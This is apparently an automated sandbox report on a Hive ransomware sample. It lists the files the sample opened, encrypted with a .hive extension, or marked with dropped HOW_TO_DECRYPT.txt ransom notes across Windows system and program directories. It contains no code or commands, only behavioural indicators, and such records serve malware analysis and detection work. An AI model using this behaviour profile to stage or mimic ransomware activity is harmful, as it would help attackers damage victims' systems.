File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4NH6FMWO\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2212144002-1172735686-1556890956-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VUPQHL12\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\OORJZY5Z\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\en-US\Licenses\eval\HomePremium\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\ja-JP\Licenses\OEM\StarterE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\_Default\Starter\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\sysprep\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\elxstor.inf_amd64_neutral_4263942b9dfe9077\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\lsi_fc.inf_amd64_neutral_a7088f3644ca646a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnep003.inf_amd64_neutral_92ed2d842e0dd4ea\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Printing_Admin_Scripts\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\HomeBasicE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\HomePremiumN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnlx00e.inf_amd64_neutral_0a4797d9b127d3a7\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\eval\HomeBasicN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spp\tokens\channels\OCUR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\ProfessionalN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnep00d.inf_amd64_neutral_dd61103f3a2743d4\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnnr002.inf_amd64_neutral_37896c5e81c8d488\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\SMI\Schema\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\Microsoft\Windows\Power Efficiency Diagnostics\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\eval\Ultimate\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\_Default\Professional\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmetech.inf_amd64_neutral_230358eeb58f0b3b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmmcd.inf_amd64_neutral_49212f5920298e45\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnbr002.inf_amd64_neutral_db1d8c9efda9b3c0\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\en-US\Licenses\OEM\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\0411\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmarch.inf_amd64_neutral_4261401e3170ebfb\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnxx002.inf_amd64_neutral_560fdd891b24f384\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wialx004.inf_amd64_neutral_0a3a62ae6ed43127\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnhp004.inf_amd64_neutral_53f688945cfc24cc\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ws3cap.inf_amd64_neutral_eeaccb8f1560f5fb\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\migwiz\dlmanifests\Microsoft-Windows-NetworkLoadBalancing-Core\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\Enterprise\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hpoa1nd.inf_amd64_neutral_cf39c48277e038de\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\de-DE\Licenses\OEM\ProfessionalN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\pl-PL\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\de\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\migwiz\replacementmanifests\microsoft-windows-ndis\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\LogFiles\Fax\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\cxraptor_fm1236mk5_ibv64.inf_amd64_neutral_b81bec917adfaea5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnso002.inf_amd64_neutral_c3b7ce4e6f71641f\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\de-DE\Licenses\_Default\HomePremium\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\wbem\Logs\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\HomePremiumE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Microsoft\Protect\S-1-5-18\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\SMI\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\ja-JP\Licenses\OEM\ProfessionalN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnlx00w.inf_amd64_neutral_d4c93bb2fbf75723\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\LogFiles\Fax\Incoming\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\OEM\EnterpriseN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnts003.inf_amd64_neutral_33a68664c7e7ae4b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\de-DE\Licenses\OEM\ProfessionalE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\fr-FR\Licenses\OEM\HomePremium\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\migwiz\replacementmanifests\WindowsSearchEngine\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\HomePremiumN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ts_generic.inf_amd64_neutral_1a5c861fdb3aab0e\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Setup\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\winrm\0C0A\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\it-IT\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera.2bFe2RNXl41EgVSI0NCD70GP5cOBwBdJuW580hA-2Vo.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.2bFe2RNXl41EgVSI0NCD78oP2MmmoJJdQji997Mgok8.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN011.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN048.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSLID.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_standard_plugin.dll.2bFe2RNXl41EgVSI0NCD7xkiSyCU1ScgKS0pFyu_um4.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\settings.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01237_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN022.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_ca.dll.2bFe2RNXl41EgVSI0NCD7wvCobrLKWhf2w-HM8r4bUs.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\TextConv\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\System.Speech.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga.2bFe2RNXl41EgVSI0NCD7796YB0cEIkZE1e0ETZVTnM.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Data.Entity.Design.Resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\flyout.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.2bFe2RNXl41EgVSI0NCD76S1cWGVPlodmooWj50QGCs.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta.2bFe2RNXl41EgVSI0NCD73k8tJvkjocOZFPmdmKa_VM.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VGX\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\eo\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver.2bFe2RNXl41EgVSI0NCD77yOdKtCVsxDEjPe1eDUkxg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_10_p010_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\background.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OISGRAPH.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL081.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page_PAL.wmv C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe.2bFe2RNXl41EgVSI0NCD775SzVPF-wkk8ebqOL-eiUs.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise.2bFe2RNXl41EgVSI0NCD70MYSwJwaNsVo_aPuISJXyQ.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87.2bFe2RNXl41EgVSI0NCD77GB3T9BMkka3AYItwybdSU.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-left.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\RSSFeeds.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar.2bFe2RNXl41EgVSI0NCD79z0a_HYFy0Z2qW31I2ayVg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\background.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
